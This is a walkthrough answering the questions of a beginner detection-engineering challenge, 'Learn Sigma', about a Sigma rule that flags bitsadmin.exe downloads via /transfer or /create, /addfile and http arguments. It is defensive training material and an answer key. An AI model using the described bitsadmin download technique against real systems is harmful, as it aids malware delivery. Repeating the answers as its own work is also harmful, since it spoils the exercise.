Back to Walkthroughs
Learn Sigma
Let's Defend Malware Analysis [Beginner]Beginner

Learn Sigma

#tutorial

Challenge Description

image

Solution and Analysis

Firstly open the yml file in notepad++ to analyze it

image

1. Which executable file was specifically targeted by this Sigma rule?

  • Answer: The rule specifically targets the bitsadmin.exe executable. This is defined in the selection_img block, which looks for a process image name ending in \bitsadmin.exe.

2. What command-line option is used to indicate a file transfer in this rule?

  • Answer: The primary command-line option used to indicate a file transfer is /transfer, as specified in the selection_cmd block.

3. What logical expression in the condition field combined the criteria to trigger this rule?

  • Answer: The logical expression is selection_img and (selection_cmd or all of selection_cli_*). This means the rule triggers if the bitsadmin.exe process is created AND either the simple /transfer command is used OR the combination of /create, /addfile, and a URL (http) is present.

4. Which specific field did this rule capture that shows the command being executed?

  • Answer: The rule is configured to capture the CommandLine field. This field contains the full command string that was executed, which is essential for investigating the activity.

5. Which single ATT&CK tactic tag is listed first in this rule?

  • Answer: The first MITRE ATT&CK tactic listed is attack.defense-evasion. This aligns with the technique of using a trusted system utility to perform malicious actions.

6. What is the primary category of events that this Sigma rule was written to monitor?

  • Answer: The rule monitors the process_creation event category, as specified in the logsource section. This means the rule triggers whenever a new process is started.

7. What specific command-line argument did this rule look for to identify HTTP-based downloads?

  • Answer: The rule looks for the presence of the string http within the command line. This is defined in the selection_cli_2 block and serves as a strong indicator of a download from a web server.

8. Which command-line option must be present to create a new transfer using bitsadmin?

  • Answer: To create a new transfer job, the /create command-line option must be present. This is a key part of the multi-step download detection logic defined in selection_cli_1.

Conclusion

In summary, this Sigma rule provides robust detection for a known malicious technique. By monitoring process_creation events for bitsadmin.exe and inspecting the command-line arguments for specific switches like /transfer or the /create and /addfile combination, it can effectively identify attempts to download files from the internet, a common step in malware infection chains.